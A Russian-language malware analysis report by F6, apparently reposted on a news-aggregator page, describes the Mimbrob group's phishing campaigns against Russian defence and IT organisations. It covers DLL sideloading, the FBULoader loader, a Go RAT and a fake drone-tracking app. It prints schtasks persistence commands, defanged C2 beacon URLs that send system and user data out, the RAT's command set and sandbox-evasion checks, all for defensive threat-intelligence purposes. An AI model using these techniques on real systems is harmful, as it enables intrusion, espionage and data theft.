Punch2027: Obidients reject INEC’s plan to use AIThe Jerusalem PostSome 18 injured in eight-car pileup on Highway 6 in central Israel, halting trafficDaily MaverickWORLD HEART DAY: Silent killer, simple fix? How to save SA from hypertensionRTP DesportoJaime Faria falha acesso ao quadro principal do torneio de TóquioInquirerTulfo flags ‘palakasan system’ in NHA housing beneficiary selectionVanguardOtti to Ndigbo: Don’t fight Chinese traders; beat them with technologyColliderArthur Morgan Actor Officially Addresses One of 'Red Dead Redemption 2's Biggest Fan Theories [Exclusive]20 Minuten«Überall liegt Staub»: Das Schächental nach dem FelssturzThe South AfricanDay 15 of 24: Festive Quiz – Test your Local Government Elections 2026 knowledge and win R250NMEVictoria Beckham “back in the studio” as she records vocals with son CruzIl Fatto QuotidianoNations League, la situazione dell’Italia: la nuova classifica, la sfida alla Francia, Montella a rischio | Cosa c’è in balloSportstarIndia in Athletics LIVE Updates, Asian Games 2026: Dev Meena, Kuldeep Kumar clear 5.35m in men's pole vault final; Pooja, Supriya in action in women's high jump
The Daily Newsstand · Free, Always
Tuesday, September 29, 2026

«Баба-яга» на крючке: новая активность Mimbrob нацелена на российский ВПК и IT-компании

Translate

В апреле 2026 года специалисты департамента киберразведки (Threat Intelligence) компании F6 обнаружили волну вредоносной активности. Достаточных оснований для того, чтобы атрибутировать эту активность какой-либо из ранее известных киберпреступных группировок, не было. Атакующие рассылали фишинговые письма с архивами, нацеленные на организации в авиакосмической промышленности. Содержимое архивов включало в себя легитимный исполняемый файл (чаще всего Яндекс Браузера) и вредоносную DLL, загружаемую с помощью техники DLL Sideloading. Командные серверы атакующих мимикрировали под технические домены Yandex, а адреса отправителей писем – под реальные организации. Специалисты F6 Threat Intelligence присвоили группе название Mimbrob – mim по мимикрии в доменах и файлах, br – от использования браузеров в атаках, rob – от найденного на скомпрометированном домене логотипа.

Атакующие впервые проявили активность в апреле 2026 года, параллельно распространяя через фишинговые письма ВПО на Go и загрузчик FBULoader. Затем в мае злоумышленники через свой сайт распространяли загрузчик FBULoader под видом приложения Dronner для отслеживания дронов типа «Баба-яга». С начала сентября группировка возобновила активность и распространяет фишинговые письма на тему судебных разбирательств, нацеленные на IT-компании.

Судя по выбору целей и качеству составления фишинговых писем для рассылок, вероятная цель атакующих – шпионаж. Так как финальная нагрузка в ходе исследования не была получена, более точные выводы о мотивации остаются в области предположений.

Поскольку атакующие параллельно распространяли и DLL-загрузчик FBULoader, и ВПО на Go, далее будет описана каждая из цепочек атаки.

Фишинговые письма и FBULoader

Наиболее ранний из зафиксированных образцов активности группировки относится к 22 апреля 2026 года. Цепочка атаки начинается с фишингового письма, отправленного в российское предприятие, которое занимается созданием авиационных и ракетных двигателей. Отправитель письма предположительно был скомпрометирован, так как домен отправителя принадлежит легитимной компании, занимающейся оптоэлектронными системами измерения.

Письмо замаскировано под служебную записку о необходимости срочного проведения метрологической проверки всей продукции предприятия и обновления специализированного ПО. Текст письма выдержан в официально-деловом стиле, содержит ссылки на федеральные законы и нормативные акты, которые относятся к теме сообщения, при этом в нём нет ошибок.

Фишинговое письмо, замаскированное под служебную записку о метрологической проверке

Рисунок 1 – Фишинговое письмо

Письмо содержит архив «Поверка [название предприятия] 22.04.rar». В архиве находятся несколько переименованных легитимных файлов Яндекс Браузера, и в папке 25.0.1364.13754 – вредоносная DLL. При запуске любого из исполняемых файлов, легитимный файл подгрузит вредоносную DLL browser.dll с помощью техники DLL Sideloading. Сама DLL является загрузчиком, который специалистами F6 был назван FBULoader (аббревиатура от Fake Browser Update Loader – фальшивый загрузчик обновления браузера), поскольку во всех обнаруженных сэмплах использовался файл браузера, а домены мимикрировали под его инфраструктуру.

Содержимое архива «Поверка [название предприятия] 22.04.rar»: переименованные файлы Яндекс Браузера и папка с вредоносной DLL

Рисунок 2 – Содержимое архива «Поверка [название предприятия] 22.04.rar»

На тему «поверки» было найдено еще два архива: «Poverka2026.zip» и «na_otsos.rar». Оба архива содержали тот же легитимный файл Яндекс Браузера и вредоносные DLL-загрузчики.

4 мая 2026 года системой F6 MXDR были заблокированы еще несколько рассылок, направленных в исследовательский институт. Рассылка проводилась с адреса v.kichenko@klirnov.ru. Домен klirnov[.]ru принадлежит атакующим и мимикрирует под российского разработчика в авиационной сфере.

Фишинговая рассылка от 28 апреля с адреса на домене klirnov[.]ru

Рисунок 3 – Фишинговая рассылка от 4 мая

Письмо аналогично содержит вложение-архив «Dogovor_01.04.rar». Структура архива такая же, как и во всех обнаруженных сэмплах: легитимный переименованный файл Яндекс Браузера и в папке 25.0.1364.13754 (название в зависимости от версии браузера) – вредоносная DLL.

Содержимое архива «Dogovor_01.04.rar»

Рисунок 4 – Содержимое архива «Dogovor_01.04.rar»

Содержимое папки 25.0.1364.13754 в архиве «Dogovor_01.04.rar»

Рисунок 5 – Содержимое архива «Dogovor_01.04.rar»

Фишинговые атаки с использованием FBULoader были зафиксированы с 22 апреля по 8 мая, новая волна – с 3 сентября по настоящее время. В сентябре системой F6 MXDR были заблокированы письма, направленные в адрес нескольких ИТ-компаний. Письма отправлены с электронного адреса admin@npkarns[.]ru, домен npkarns[.]ru мимикрирует под домен российского научно-производственного предприятия. Стоит отметить, что все три домена, которые атакующие сами создавали для отправки писем, были зарегистрированы в один день – 16 апреля 2026 года. В качестве вложения были прикреплены архивы с именами «Судебное_разбирательство[дата].rar», которые, аналогично предыдущим, содержали легитимный исполняемый файл и вредоносную DLL.

Пример сентябрьской рассылки на тему судебного разбирательства

Рисунок 6 – Пример сентябрьской рассылки

Далее предоставлен разбор цепочки атаки с DLL-загрузчиком FBULoader на примере архива «Dogovor_01.04.rar». Все перечисленные выше архивы приводят к аналогичной цепочке заражения с разницей в С2-серверах. В индикаторах компрометации приведены все обнаруженные архивы и их содержимое, а также связанные С2-адреса.

Имя файла

MD5

Описание

Dogovor_01.04.rar

4a1c0fe99341908b2930de2ad2ec2522

Архив

Perechen_komponentov_dlya_kooperatsii_BP-XXX_i_privody.exeTekhnicheskie_trebovaniya_k_komponentam_TU_i_STO.exeProekt_soglasheniya_o_kooperatsii_i_primernyy_grafik_postavok.exePredlozhenie_o_sotrudnichestve_po_proizvodstvu_komponentov_2026.exe

900ce1d4bcd1510276c4263d4aa3d78d

Легитимный файл Яндекс Браузера

browser.dll

4ca176d7f26664fc0f03c8289762f1c4

Вредоносная DLL, загружаемая с помощью техники DLL Sideloading

browser.dll

0426d58893826924324fd95ad76f4c97

Полезная нагрузка из DLL, С2: checker[.]yandex-update[.]ru

В архиве под разными именами содержатся несколько исполняемых файлов браузера, подписанных легитимной цифровой подписью Yandex. Имена файлов маскируются под деловые документы: перечень компонентов, предложение о сотрудничестве, проект соглашения, технические требования. Запуск любого из этих файлов приводит к реализации DLL Sideloading библиотеки browser.dll из директории 25.0.1364.13754, которая поставляется вместе с остальными .exe файлами в архиве.

Цифровая подпись Yandex у легитимного исполняемого файла

Рисунок 7 – Подпись легитимного файла (MD5: 900ce1d4bcd1510276c4263d4aa3d78d)

Загружаемая вредоносная библиотека browser.dll создает директорию C:\Users\{username}\AppData\Roaming\Yandex\YaBrowser, копирует в нее изначально запущенный .ехе под именем browser.exe, создает директорию C:\Users\{username}\AppData\Roaming\Yandex\YaBrowser\25.0.1364.13754 и извлекает из browser.dll полезную нагрузку, записывая ее под именем browser.dll.

Далее извлекает файл-приманку «Perechen_komponentov_dlya_kooperatsii_BP.pdf» во временную директорию и открывает ее. Параллельно создается задача в планировщике задач с названием «Browser Update Checker» на запуск C:\Users\{username}\AppData\Roaming\Yandex\YaBrowser\browser.exe каждые 15 минут.

Отвлекающий документ, который открывается жертве

Рисунок 8 – Содержимое отвлекающего файла

Запланированная задача в свою очередь запускает извлеченный browser.dll из директории C:\Users\{username}\AppData\Roaming\Yandex\YaBrowser\25.0.1364.13754. Он расшифровывает URL hxxps://checker[.]yandex-update[.]ru/api/verify/. Алгоритм расшифровки кастомный: последовательная обработка каждого символа с помощью битовых операций над двумя байтами из таблицы зашифрованных данных и циклически повторяющегося ключа. Загрузчик собирает информацию о системе – hwid, версию ОС, имя PC, имя пользователя, число ядер процессора – и отправляет ее следующим запросом:

hxxps://checker[.]yandex-update[.]ru/api/verify/?current=25.2.64.1&p=c&sa=9&wv={oc_num_version}&wvhr=Windows{oc_version}&hwid={hwid}&u={pc_name}%5C{username}

В ответ загрузчик ожидает получение новой полезной нагрузки с последующим инжектом в текущий процесс и запуском. В ходе исследования не удалось получить или обнаружить следующую стадию.

Фишинговые письма и RAT-Go

Параллельно с фишинговыми рассылками с FBULoader, группировка распространяла другое ВПО, названное атакующими RAT-Go. Поскольку мы обнаружили всего три образца данного ВПО в апреле, далее оно будет обозначено так же, как во внутреннем проекте атакующих. Указанная полезная нагрузка была зафиксирована с 24 по 28 апреля.

Цепочка атаки начиналась с фишингового письма с архивом. В качестве отправителя письма использовалась личность реального сотрудника научного института, а домен мимикрировал под оригинальный – vniirn[.]ru. Сообщение было замаскировано под предложение о сотрудничестве.

Фишинговое письмо с RAT-Go, замаскированное под предложение о сотрудничестве

Рисунок 9 – Пример фишинговой рассылки с RAT-Go

Всего удалось обнаружить три таких архива: «Зарплаты.rar», «Новые.rar» и «Перечень_компонентов_и_технические_требования.rar» (вложение письма из примера выше).

Первые два архива, «Зарплаты.rar» и «Новые.rar», содержали одинаковый легитимный файл Notepad++ и вредоносную DLL. Также архив «Зарплаты.rar» содержал документ-приманку, которая использовалась и при распространении FBULoader.

Содержимое архива «Зарплаты.rar»

Рисунок 10 – Содержимое архива «Зарплаты.rar»

Содержимое архива «Новые.rar»

Рисунок 11 – Содержимое архива «Новые.rar»

Документ-приманка «Ведомость начислений.pdf»

Рисунок 12 – Декой «Ведомость начислений.pdf»

Имя файла

MD5

Описание

Новые.rar

25334e01a65c5bb07048ad6d74592d8a

Архив

Зарплаты.rar

9282c4a105f1b6d32212f836debf21b2

Архив

Измененный договор.exe / Ведомость.exe

512f4350aee7eb50adf509008a3ad3ce

Легитимный файл notepad++

MSASN1.dll

9a0901dc40fb4695672cb21681c94bf6

Вредоносная DLL, загружаемая с помощью техники DLL Sideloading

Открытие исполняемого файла из архива (который на самом деле является переименованным Notepad++) приводит к загрузке вредоносной библиотеки MSASN1.dll с помощью техники DLL Sideloading.

Вредоносная MSASN1.dll содержит закодированную в Base64 нагрузку. Вызов функции run_base64_payload для расшифровки и запуска данной нагрузки реализован в DllMain. Расшифрованная нагрузка сохраняется по пути: C:\Users\{username}\AppData\Local\Temp с именем chr{4}[a-zA-Z0-9].tmp. Стоит отметить, что при анализе сэмпла была найдена строка "ТУТ_ВСТАВЬ_СВОЙ_BASE64":

Строка «ТУТ_ВСТАВЬ_СВОЙ_BASE64», найденная при анализе MSASN1.dll

Рисунок 13 – Найденная строка

Промежуточная нагрузка chr{4}[a-zA-Z0-9].tmp формирует два пути – C:\Users\{username}\AppData\Roaming\Microsoft\Windows и C:\Users\{username}\AppData\Local\Temp – и декодирует из Base64 конечную полезную нагрузку и отвлекающий PDF. Конечная нагрузка сохраняется как diskmanager.exe в C:\Users\{username}\AppData\Roaming\Microsoft\Windows, а отвлекающий PDF – как document.pdf во временной директории. Файл document.pdf при открытии оказывается нечитаемым. Причина в том, что он был дважды закодирован в Base64, тогда как декодирование выполняется только один раз. При корректном двойном декодировании содержимое совпадает с документом «Ведомость начислений.pdf», то есть приманка задумывалась как рабочий файл, но из-за ошибки в логике так и не открывается у жертвы. После развертывания в планировщике задач создается задача DiskManager, запускающая diskmanager.exe с интервалом в одну минуту.

schtasks /create /tn DiskManager /tr C:\Users\admin\AppData\Roaming\Microsoft\Windows\diskmanager.exe /sc minute /mo 1 /f

Файл diskmanager.exe представляет собой клиентскую часть RAT, написанную на Go. При анализе были обнаружены строки rat_go_common_* и /home/kali/Desktop/v1_deploy_fix/war_22.11/rat-go/*, а также отладочные пути /home/kali/.gvm/go1.20/src/runtime/..., указывающие на компиляцию в системе с пользователем kali и использованием GVM и Go 1.20. При инициализации он настраивает AES-GCM для шифрования трафика, используя встроенный ключ, после чего входит в бесконечный цикл попыток установить TCP-соединение с C2 82[.]38[.]63[.]88:6969. Попытки повторяются до успеха, между ними выдерживается пауза в пять секунд. После установления соединения RAT переходит в цикл обработки команд. Формат команд: четыре байта типа команды, затем тело команды. Например, последовательность 00 00 00 00 64 69 72 соответствует пользовательскому вводу 0dir. Поддерживаются четыре типа команд:

Код

Наименование

Описание

0

cmd_exec

Запуск командной строки (cmd.exe) с последующим выполнением переданной команды. Результат отправляется обратно на C2.

1

upload

Прием файла от C2 и запись его на диск жертвы (загрузка на хост).

2

download

Чтение файла с файловой системы жертвы и отправка его на C2 (выгрузка с хоста).

3

disconnect

Закрытие соединения с C2.

При анализе нам удалось обнаружить следующие команды, отправленные атакующими во время работы сэмплов:

  • echo ping

  • systeminfo

В еще одном архиве, «Перечень_компонентов_и_технические_требования.rar», цепочка атаки была слегка изменена. Вместо Notepad++ в качестве легитимного файла снова используется Яндекс Браузер, заражение также реализуется через DLL Sideloading – на этот раз подгружается библиотека 32.0.1700.12599\browser.dll.

Отличие от предыдущей атаки заключается в том, что промежуточный файл (по типу chr{4}[a-zA-Z0-9].tmp) отсутствует. Файл browser.dll извлекает основную полезную нагрузку под именем yandex_service.exe напрямую. Также задача в планировщике теперь называется YandexUpdate:

schtasks.exe /create /tn YandexUpdate /tr C:\Users\Daren\AppData\Roaming\Microsoft\Windows\yandex_service.exe /sc minute /mo 1 /f

И в yandex_service.exe все значимые строки (IP, порт, путь для сохранения файлов, аргументы командной оболочки) теперь хранятся в зашифрованном виде (для расшифровки используется AES-GCM). С2 в данном случае был 194.87.37[.]14:443.

Распространение FBULoader под видом приложения Dronner

В ходе исследования специалистами F6 был найден сайт dronner[.]ru, зарегистрированный 11 мая 2026 года. С него распространялось десктопное приложение Dronner, по описанию сайта, якобы предназначенное для получения информации и отслеживания дронов типа «Баба-яга» (тяжёлые беспилотники, переделанные из сельскохозяйственных, которые ВСУ используют в боевых целях, в том числе для дистанционного минирования).

Судя по описанию на сайте-приманке, приложение якобы позволяет получать информацию о местах пролёта таких дронов и точках минирования. Такая информация может быть актуальна для подразделений, которые действуют вблизи линии боевого соприкосновения – следовательно, можно предположить, что атака с использованием вредоносного приложения Dronner нацелена на российских военнослужащих.

Сайт-приманка dronner[.]ru с описанием приложения Dronner

Рисунок 14 – Содержимое сайта dronner[.]ru

На момент исследования с сайта скачивался файл DronnerInstaller_2.8.5.exe. При запуске открывалось приложение-заглушка с таким содержимым.

Окно приложения-заглушки Dronner

Рисунок 15 – Приложение Dronner

Файл упакован с помощью инструмента WiX Toolset. При запуске извлекается основной установщик dronner.msi.

dronner.msi -> browser.exe + browser_elf.dll -> C:\Users\{username}\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad (легитимные файлы) + C:\Users\{username}\AppData\Local\Microsoft\Edge Browser Dev (browser.exe + другой browser_elf.dll)

Установщик создает 2 директории: C:\Users\{username}\AppData\Roaming\Dronner и C:\Users\{username}\AppData\Local\Temp\0f27c12e\, в последнюю извлекает browser.exe и browser_elf.dll. После завершения установки запускается browser.exe.

При запуске browser.exe вызывается функция SignalChromeElf из библиотеки 16.10.0.2564/browser_elf.dll. В отличии от ранее изученных атак, в данном случае нет реализации DLL Sideloading. Вместо этого библиотека browser_elf.dll присутствует в таблице импорта файла browser.exe и функция SignalChromeElf вызывается явно.

Стоит отметить, что browser_elf.dll имеет 13 экспортируемых функций. За исключением стандартной DllEntryPoint, все функции ведут по 1 адресу, следовательно библиотека экспортирует 1 функцию под разными именами.

Таблица экспорта browser_elf.dll: 13 функций, ведущих по одному адресу

Рисунок 16 – Таблица экспорта browser_elf.dll

Далее происходит проверка окружения:

  • Сэмпл получает информацию о языке системы, предпочитаемых языках интерфейса и установленных раскладках клавиатуры. Список регионов: "ru", "uk", "be", "uz", "kk", "az", "hy", "ka", "ky", "tg", "tk", "ro" (СНГ + Румыния). В случае обнаружения хотя бы одного из списка – сэмпл продолжает работу.

  • Проверяет текущие права. Если сэмпл запущен без повышенных прав – работа продолжается. Это делается для обхода песочниц, поскольку как правило, песочницы запускают сэмплы с правами администратора.

  • Во всех остальных случаях сэмпл переходит в sleep на 3 минуты и завершает работу.

Далее создается директория C:\Users\{username}\AppData\Local\Microsoft\Edge Browser Dev, куда копируются browser.exe и распаковывается другая версия browser_elf.dll. Файл browser.exe закрепляется в планировщике с названием CocCoc Browser Update, выполняется каждые 10 минут.

Запуск browser.exe и новой версии browser_elf.dll: также вызывается функция SignalChromeElf из browser_elf.dll; аналогично проводится проверка окружения. Далее происходит сбор информации о системе: архитектура процессора, версия OC, версия сборки OC, серийный номер текущего диска, hwid системы, имя ПК, имя пользователя. Формируется запрос на С2: browser[.]ydx-stat[.]ru. Полный URL:

hxxps://browser[.]ydx-stat[.]ru/api/r/?bid=eb260e0e&sa=9&wv={OC_Version}&wvhr={OC_Build_Version}&hwid={Disk_Serial_and_hwid}&u={username}%5C{pcname}

где:

  • bid – ID сэмпла

  • sa – архитектура процессора

  • wv – версия ОС

  • wvhr – версия билда ОС

  • hwid – серийный номер диска + hwid системы

  • u – имя пользователя и ПК

После сэмпл получает от С2 зашифрованную полезную нагрузку. Алгоритм шифрования такой же, как и при расшифровке строк в сэмпле: модификация RC4 с блоком размером 94. Однако для расшифровки полезной нагрузки, полученной от C2, дополнительно используется ключ, вшитый в первые 8 байт нагрузки.

Подробности исследования, сетевой инфраструктуры атакующих, индикаторы компрометации можно найти в блоге на сайте F6.

View the original on Хабр →

KioskNews shows a cleaned-up reading view extracted from the publisher’s page — the original always lives on their site, not ours.